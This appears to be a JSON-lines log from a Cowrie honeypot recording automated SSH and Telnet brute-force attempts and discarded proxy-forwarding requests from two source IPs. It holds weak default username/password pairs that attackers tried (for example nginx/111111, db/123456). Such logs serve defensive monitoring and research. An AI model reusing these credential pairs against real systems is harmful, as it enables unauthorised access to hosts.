{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.955646Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"193.105.134.95","src_port":25769,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25769","sensor":"my-vps","timestamp":"2025-09-09T01:29:00.086904Z","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:29:00.131509Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:00.176904Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.session.closed","duration":12.75036334991455,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:04.350655Z","src_ip":"212.227.235.229","session":"703fc218f88c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33690,"dst_ip":"1.2.3.4","dst_port":23,"session":"08a191fe0223","protocol":"telnet","message":"New connection: 212.227.235.229:33690 (1.2.3.4:23) [session: 08a191fe0223]","sensor":"my-vps","timestamp":"2025-09-09T01:29:04.570256Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53306,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a7c1d80a51","protocol":"ssh","message":"New connection: 212.227.235.229:53306 (1.2.3.4:22) [session: 27a7c1d80a51]","sensor":"my-vps","timestamp":"2025-09-09T01:29:05.057906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:29:05.059416Z","src_ip":"212.227.235.229","session":"27a7c1d80a51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:29:05.176977Z","src_ip":"212.227.235.229","session":"27a7c1d80a51"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"password1","message":"login attempt [testuser/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:29:05.690353Z","src_ip":"212.227.235.229","session":"27a7c1d80a51"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:06.810690Z","src_ip":"212.227.235.229","session":"27a7c1d80a51"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:12.163276Z","src_ip":"212.227.235.229","session":"729c2bc558e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34827,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd037f9c4201","protocol":"ssh","message":"New connection: 212.227.235.229:34827 (1.2.3.4:22) [session: fd037f9c4201]","sensor":"my-vps","timestamp":"2025-09-09T01:29:14.143958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:29:14.144951Z","src_ip":"212.227.235.229","session":"fd037f9c4201"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:29:14.379415Z","src_ip":"212.227.235.229","session":"fd037f9c4201"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:29:15.361727Z","src_ip":"212.227.235.229","session":"fd037f9c4201"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:16.599322Z","src_ip":"212.227.235.229","session":"fd037f9c4201"}
{"eventid":"cowrie.session.closed","duration":12.73823618888855,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:17.308398Z","src_ip":"212.227.235.229","session":"08a191fe0223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34007,"dst_ip":"1.2.3.4","dst_port":23,"session":"10e8c36532d1","protocol":"telnet","message":"New connection: 212.227.235.229:34007 (1.2.3.4:23) [session: 10e8c36532d1]","sensor":"my-vps","timestamp":"2025-09-09T01:29:17.591617Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54416,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7387ae91cf4","protocol":"ssh","message":"New connection: 212.227.235.229:54416 (1.2.3.4:22) [session: e7387ae91cf4]","sensor":"my-vps","timestamp":"2025-09-09T01:29:28.003326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:29:28.004284Z","src_ip":"212.227.235.229","session":"e7387ae91cf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:29:28.235923Z","src_ip":"212.227.235.229","session":"e7387ae91cf4"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:29:29.196858Z","src_ip":"212.227.235.229","session":"e7387ae91cf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57604,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cc0b0752922","protocol":"ssh","message":"New connection: 212.227.235.229:57604 (1.2.3.4:22) [session: 1cc0b0752922]","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.214643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.215556Z","src_ip":"212.227.235.229","session":"1cc0b0752922"}
{"eventid":"cowrie.session.closed","duration":12.717318296432495,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.308871Z","src_ip":"212.227.235.229","session":"10e8c36532d1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.430712Z","src_ip":"212.227.235.229","session":"e7387ae91cf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.478120Z","src_ip":"212.227.235.229","session":"1cc0b0752922"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34325,"dst_ip":"1.2.3.4","dst_port":23,"session":"3234dcfa4979","protocol":"telnet","message":"New connection: 212.227.235.229:34325 (1.2.3.4:23) [session: 3234dcfa4979]","sensor":"my-vps","timestamp":"2025-09-09T01:29:30.563017Z"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:29:31.570315Z","src_ip":"212.227.235.229","session":"1cc0b0752922"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:32.836022Z","src_ip":"212.227.235.229","session":"1cc0b0752922"}
{"eventid":"cowrie.session.closed","duration":12.73468279838562,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:43.297631Z","src_ip":"212.227.235.229","session":"3234dcfa4979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34653,"dst_ip":"1.2.3.4","dst_port":23,"session":"8287820b2220","protocol":"telnet","message":"New connection: 212.227.235.229:34653 (1.2.3.4:23) [session: 8287820b2220]","sensor":"my-vps","timestamp":"2025-09-09T01:29:43.529873Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41368,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5f68a45939d","protocol":"ssh","message":"New connection: 212.227.235.229:41368 (1.2.3.4:22) [session: e5f68a45939d]","sensor":"my-vps","timestamp":"2025-09-09T01:29:48.388427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:29:48.389160Z","src_ip":"212.227.235.229","session":"e5f68a45939d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:29:48.695710Z","src_ip":"212.227.235.229","session":"e5f68a45939d"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:29:49.923992Z","src_ip":"212.227.235.229","session":"e5f68a45939d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:51.233391Z","src_ip":"212.227.235.229","session":"e5f68a45939d"}
{"eventid":"cowrie.session.closed","duration":12.74831485748291,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:29:56.278126Z","src_ip":"212.227.235.229","session":"8287820b2220"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34969,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d55b8cd3afb","protocol":"telnet","message":"New connection: 212.227.235.229:34969 (1.2.3.4:23) [session: 6d55b8cd3afb]","sensor":"my-vps","timestamp":"2025-09-09T01:29:56.529767Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34492,"dst_ip":"1.2.3.4","dst_port":22,"session":"531777f3621c","protocol":"ssh","message":"New connection: 212.227.235.229:34492 (1.2.3.4:22) [session: 531777f3621c]","sensor":"my-vps","timestamp":"2025-09-09T01:30:03.936859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:03.940241Z","src_ip":"212.227.235.229","session":"531777f3621c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42172,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2694e78097","protocol":"ssh","message":"New connection: 212.227.235.229:42172 (1.2.3.4:22) [session: 9c2694e78097]","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.080264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.081445Z","src_ip":"212.227.235.229","session":"9c2694e78097"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.351840Z","src_ip":"212.227.235.229","session":"9c2694e78097"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51206,"dst_ip":"1.2.3.4","dst_port":22,"session":"90f6ee622ce8","protocol":"ssh","message":"New connection: 212.227.235.229:51206 (1.2.3.4:22) [session: 90f6ee622ce8]","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.771125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.772201Z","src_ip":"212.227.235.229","session":"90f6ee622ce8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.891172Z","src_ip":"212.227.235.229","session":"90f6ee622ce8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52628,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ec73bcc0d0","protocol":"ssh","message":"New connection: 212.227.235.229:52628 (1.2.3.4:22) [session: 78ec73bcc0d0]","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.918778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:04.921647Z","src_ip":"212.227.235.229","session":"78ec73bcc0d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:05.165764Z","src_ip":"212.227.235.229","session":"78ec73bcc0d0"}
{"eventid":"cowrie.login.failed","username":"db","password":"123456","message":"login attempt [db/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:05.403970Z","src_ip":"212.227.235.229","session":"90f6ee622ce8"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:05.473762Z","src_ip":"212.227.235.229","session":"9c2694e78097"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:05.680921Z","src_ip":"212.227.235.229","session":"531777f3621c"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:06.166462Z","src_ip":"212.227.235.229","session":"78ec73bcc0d0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:06.523567Z","src_ip":"212.227.235.229","session":"90f6ee622ce8"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:06.745662Z","src_ip":"212.227.235.229","session":"9c2694e78097"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"qwerty","message":"login attempt [hacker/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:07.025206Z","src_ip":"212.227.235.229","session":"531777f3621c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:07.409045Z","src_ip":"212.227.235.229","session":"78ec73bcc0d0"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:08.277962Z","src_ip":"212.227.235.229","session":"531777f3621c"}
{"eventid":"cowrie.session.closed","duration":12.765334367752075,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:09.295030Z","src_ip":"212.227.235.229","session":"6d55b8cd3afb"}
